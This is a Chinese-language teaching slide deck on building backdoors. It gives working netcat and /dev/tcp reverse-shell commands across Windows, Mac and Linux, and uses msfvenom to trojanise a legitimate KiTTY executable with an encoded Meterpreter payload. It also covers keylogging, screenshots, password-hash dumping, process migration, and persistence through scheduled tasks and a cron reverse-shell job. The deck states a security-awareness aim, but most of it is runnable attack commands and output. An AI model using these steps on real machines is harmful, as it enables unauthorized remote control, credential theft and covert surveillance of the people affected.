title | theme | author | date | output |
---|---|---|---|---|
Markdown slide |
beige |
Wildlinux |
Feb 20, 2018 |
revealjs::revealjs_presentation |
学习内容:使用nc实现win,mac,Linux间的后门连接
:meterpreter的应用
:MSF POST 模块的应用
学习目标:建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。
最后编辑:~~20230221~~ Wildlinux
后门就是不经过正常认证流程而访问系统的通道。
哪里有后门呢?
--
下面是近些年的一些例子:
--
我们接下来讲得是一个相对狭义一点的后门的概念,
--
* 首先得有这么一个程序
* netcat 系列
* meterpreter
* intersect
* ...特别多
* 课题负责人需要探索一个未讲过的
* 其次得放到系统里
* 正版软件故意或被攻击,包含后门
* 正版库文件中包含后门
* 本质上,需要诱骗你下载操作的,都属于各种钓鱼吧
* 安装包中包含后门,放到网上供下载
* 绑定到特定文件中,放到网上供下载
* 直接发送恶意程序给你
* 直接发送攻击性钓鱼链接给你,恶意网站种马
* 捡到个U盘,打开个文件看看?
* 煤女帅锅拿U盘直接拷给你
* 攻击系统漏洞,获取控制权后,安装后门
* 再次还得运行起来
* 开机自启动技术
* win的定时任务
* linux的cron
* 伪装成常用软件,诱使用户点击
* 木马化正常软件
* 最后还得不被本机的恶意代码检测程序发现
* 恶意代码免杀技术
* 也不能被本机的或网络上的防火墙发现
* 反弹式连接
* 加密连接
* 隧道技术
--
1.关于netcat
是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
--
--
以下实践Windows基本Win7-64bit, Kali2-64bit.
1.windows 打开监听
c:\your_nc_dir>ncat.exe -l -p 8888
2.Linux反弹连接win
root@KaliYL:/var/www/html# nc 192.168.20.175 8888 -e /bin/sh
3.windows下获得一个linux shell,可运行任何指令,如ls
c:\your_nc_dir>ncat.exe -l -p 8888 #这条指令是第一步中输入的,不用再输
ls
--
1.Linux运行监听指令
root@KaliYL:/var/www/html# nc -l -p 8888
2.Windows反弹连接Linux
c:\your_nc_dir>ncat.exe -e cmd.exe ip_of_linux 8888
3.Linux下看到Windows的命令提示
root@KaliYL:/var/www/html# nc -l -p 8888
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Users\YLWin\Desktop\ncat>
--
Mac: nc -l 8888
Win: c:\your_nc_dir>ncat.exe -e cmd.exe ip_of_mac 8888
--
1.Windows下启动监听
Win: C:\Users\YLWin\Desktop\ncat>ncat.exe -l -p 8888
2.Mac下连接Win
bash -i >& /dev/tcp/ip_of_win/8888 0>&1
3.Win获得Mac的shell
C:\Users\YLWin\Desktop\ncat>ncat.exe -l -p 8888
[?1034hbash-3.2$ uname -a
Darwin localhost 14.5.0 Darwin Kernel Version 14.5.0: Mon Aug 29 21:14:16 PDT 2016; root:xnu-2782.50.6~1/RELEASE_X86_64 x86_64
bash-3.2$
bash-3.2$
bash-3.2$ exit
--
1.主控端/服务端MAC运行指令如下,8888是nc监听的端口号。
MacBook-Pro:$ nc -l 8888
2.受控端/客户机运行指令如下。其中 192.168.1.106 需要更改为上一步中MAC主机的IP。8888就是上一步中的端口号
root@KaliYL:/var/www/html# bash -i >& /dev/tcp/192.168.1.106/8888 0>&1
nc IP Port -e /bin/sh 可以达到同样的效果
3.MAC主机会显示Linux的命令行提示符,并运行任何Linux指令。
MacBook-Pro:$ nc -l 8888
root@KaliYL:/var/www/html# uname -a
uname -a
Linux KaliYL 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux
--
####2.1.6 Linux获取Mac Shell
1.Linux启动监听
root@KaliYL:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.20.154 netmask 255.255.255.0 broadcast 192.168.20.255
root@KaliYL:/var/www/html# nc -l -p 8888
2.Mac连接Linux
localhost:~ $ bash -i >& /dev/tcp/192.168.20.154/8888 0>&1
3.Linux获取Mac Shell
root@KaliYL:/var/www/html# nc -l -p 8888
bash-3.2$
bash-3.2$ uname -a
Darwin localhost 14.5.0 Darwin Kernel Version 14.5.0: Mon Aug 29 21:14:16 PDT 2016; root:xnu-2782.50.6~1/RELEASE_X86_64 x86_64
--
--
Start by using nc to listen on a specific port, with output captured into a file:
$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:
$ nc host.example.com 1234 < filename.in
After the file has been transferred, the connection will close automatically.
--
Netcat++,超级netcat工具。
不信?自己看README。
windows版见附件。解压即用,不用安装。
任何代理、转发等功能都可以用该工具实现。
测试环境: Kali2-2016.1 最后修改: 2016.08.28 wildlinux
基本功能(基本的连接、执行指令)
,扩展功能(如搜集用户信息、安装服务等功能)
,编码模式
,运行平台
,运行参数
--
典型的平台就包括有:
--
我们接下来学习如何使用msfenom生成后门可执行文件。我们要生成的这个后门程序是Meterpreter.
揭开Meterpreter的神秘面纱介绍了meterpreter的一些底层原理。
--
下面指令中用到的 ./KiTTYPortable.exe 是一个普通的windows可执行文件,被我复制了/home/YL/目录下,后门会被写到这个文件中。我做实验时用的是KiTTYPortable.exe,你可以用其他文件代替。不论用哪个可执行文件都可以,但当然需要复制到linux下了。
root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe
*** 或者简单点 ***
root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe
--
参数说明:
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
> 输出到哪个文件
--
在Linux如下操作至 ‘exploit'一步;
root@KaliYL:/home/YL# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 443 yes The listen port
msf exploit(handler) > set LHOST 192.168.20.136
LHOST => 192.168.20.136
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.20.136:443
[*] Starting the payload handler...
说明:
--
Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell:
[*] Sending stage (957999 bytes) to 192.168.20.176
[*] Meterpreter session 1 opened (192.168.20.136:443 -> 192.168.20.176:50169) at 2016-08-28 21:38:22 +0800
meterpreter >
meterpreter > dir
Listing Z:\yudong\PortableApps\KiTTYPortable
*=============================================*
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 170 dir 2014-08-21 18:13:08 +0800 App
40777/rwxrwxrwx 374 dir 2016-08-12 00:33:48 +0800 Data
100777/rwxrwxrwx 173040 fil 2014-06-26 06:52:12 +0800 KiTTYPortable.exe
100777/rwxrwxrwx 173040 fil 2016-08-28 21:26:40 +0800 KiTTy_backdoor.exe
40777/rwxrwxrwx 136 dir 2014-08-21 18:13:13 +0800 Other
100666/rw-rw-rw- 5347 fil 2012-06-28 09:11:58 +0800 help.html
--
--
1.help 当然是我心中的最佳人气奖不二人选。help一输一身轻松,妈妈再也不担心我忘记指令了。当然是全E文。中文都是我输的。
meterpreter > help
Core Commands第一部分是核心指令
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands第二部分是文件系统相关的
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands当然少不了网络操作的了
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands系统指令
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands用户接口,哇还可以抓取击键记录呢
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands 什么?Video?昨天哪位同学问我来着?测试Win7可拍摄。
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands提权
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
***我的win7没成功***
Priv: Password database Commands导出密码文件SAM
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
***我的win7没成功***
Priv: Timestomp Commands修改文件操作时间,清理现场用
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
这么多好玩的指令,都想试试呢,简直停不下来。
--
2.获取Windows命令行界面,以方便执行Windows内置功能指令,exit退出。
meterpreter > shell
Process 8984 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Users\YLWin\Desktop>exit
exit
meterpreter >
--
3.获取ruby交互界面,exit退出。如果你行,甚至可以用ruby直接编程(PS:我不会,所以就不多说了)。具说可以调用windows任何API。可参考《Metasploit魔鬼训练营》第九章,有一个小例子。
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.sys.config.sysinfo()
=> {"Computer"=>"YLWIN-PC", "OS"=>"Windows 7 (Build 7600).", "Architecture"=>"x64 (Current Process is WOW64)", "System Language"=>"zh_CN", "Domain"=>"WORKGROUP", "Logged On Users"=>3}
>>exit
meterpreter >
--
4.玩个进程和和迁移吧,把meterpreter HOOK到其他进程上,这样就不用怕用户把当前这个进程关闭了。
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
...会有好多进程,我就略过了...
4312 9376 iexplore.exe x86 1 YLWin-PC\YLWin C:\Program Files (x86)\Internet Explorer\iexplore.exe 发现IE,就迁移到它吧。
meterpreter > migrate 4312
[*] Migrating from 8656 to 4312...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 4312 耶,成功!
meterpreter >
*** PS: 在windows下,以管理员权限运行"命令行",输入"netstat -bn",可以查看是哪个exe在连接meterpreter ***
--
5.抓个图,偷个登陆密码啥的吧
meterpreter > screenshot
Screenshot saved to: /usr/share/intersect/Scripts/rWjouIAU.jpeg
*** 打开jpeg看看,能发现什么 ***
meterpreter > ps
Process list
=================
PID Name Path
--- ---- ----
401 winlogon.exe C:\WINNT\system32\winlogon.exe
meterpreter > migrate 401
[*] Migrating to 401...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
**** 过了一会,隔壁的管理员来了,很自然登陆了系统看看... ****
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!
*** 想窃听哪个进程,得先迁移过去哦 ***
--
MSF自带非常多的POST模块,这些模块都可以在meterpreter下使用。所谓POST模块,也就是在获得系统初步控制权后可能用到的攻击模块。
*** 针对Windows的POST模块主要有以下一些,这些既是目录名,其实也相当于是POST模块的类型 ***
root@KaliYL:/usr/share/metasploit-framework/modules/post/windows# ls
capture escalate gather manage recon wlan
***信息抓取 提权 信息搜集 管理 recon 无线 ***
--
POST使用很简单,在获取meterpreter会话后,会两条基本指令:info 查看POST的说明,run 运行POST,即可。具体有哪些POST可用,可以进到上面那些目录中看。
*** 这个POST是用来检查被控机是否是虚拟机 ***
meterpreter > info post/windows/gather/checkvm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module attempts to determine whether the system is running
inside of a virtual environment and if so, which one. This module
supports detectoin of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen,
and QEMU.
*** run ***
meterpreter > run post/windows/gather/checkvm
[*] Checking if YLWIN-PC is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >
***试着导出密码呢!提示需要SYSTEM权限才可以!建议是migrate到一个服务进程试试!试了几个迁移失败。***
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY e791bff46194c82f87e08b89c249535b...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
***试试键盘记录***
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against YLWIN-PC
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20161026094348_default_192.168.20.145_host.windows.key_150214.txt
[*] Recording keystrokes...
***CTL+C 结束记录***
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
meterpreter >
***都在这个文件中了:/root/.msf4/loot/20161026094348_default_192.168.20.145_host.windows.key_150214.txt
***
--
两种方式《Metasploit魔鬼训练营》411页有。
1.run persistence
*** 一定学会看帮助 ***
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
***试试,不成功,因为最后没有成功的输出 ***
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.20.136
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/YLWIN-PC_20161026.0846/YLWIN-PC_20161026.0846.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.20.136 LPORT=443
[*] Persistent agent script is 99614 bytes long
meterpreter >
--
2.run metsvc
***不成功,可能原因是:当前进程没有SYSTEM权限。归结到一个问题:如何提权?***
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
meterpreter >
--
3.其他
对于我们这种场景就简单了,应用已经在系统时了,让它自启动就可以了。加计划任务,或手工修改注册表的可以。
--
新建任务计划
触发器
当锁定任何用户的工作站时
操作->程序或脚本
c:\Users\YLWin\Desktop\ncat\ncat.exe
操作->添加参数:
-e cmd.exe 192.168.1.105 8080
在主控机192.168.1.105:8080上打开nc,每当受控机用户锁定时,都会连接到192.168.1.105:8080.实测有效。
--
--
powershell是微软的增强shell,在现在发行的Windows(如Win7)都内置了。你可以在"运行"中输入"powershell",就会得到一个和cmd.exe窗口看起来一样的东东。不过它支持几乎所有的Windows操作。凡是图形界面可以做的,powershell下都可以做。也支持脚本编程。
一个副作用就是,powershell脚本写成恶意代码,杀毒软件几乎检测不出来(可能是用的少,杀毒软件不检测)。
powershell下也有类似netcat的powercat。可以做后门。
--
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
--
1.crontab指令增加一条定时任务,"-e"表示编辑。
root@KaliYL# crontab -e
no crontab for root - using an empty one
Select an editor. To change later, run 'select-editor'.
1. /bin/nano <---- easiest
2. /usr/bin/mcedit
3. /usr/bin/vim.basic
4. /usr/bin/vim.gtk
5. /usr/bin/vim.tiny
--
2.因为是第一次编辑,故提示选择编辑器,我选择了3,并添加了最后一行。简单说就是在每个小时的第43分钟执行后面的那条指令。
Choose 1-5 [1]: 3
crontab: installing new crontab
# m分钟 h小时 dom日期 mon月 dow周几 command执行的命令
43 * * * * /bin/netcat 192.168.1.105 8090 -e /bin/sh
--
3.保存、退出后配置即生效。可以通过"crontab -l"来查看,"-l"表示list。
root@KaliYL# crontab -l
43 * * * * /bin/netcat 192.168.1.105 8090 -e /bin/sh
--
4.每个小时到了43分,上面的那条指令就会执行。
5.如果你在另一台主机192.168.1.105让nc侦听在8090端口,那到了43分就会有获得一个shell。实测有效。这就是一个最简单的反弹式后门。你也可以开一个非反弹式的后门,如把cron指令写成"nc -l -p 8087 -e /bin/sh",你的主控机可以随时连接这个主机"nc IP 8087",就能获得shell。
--
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。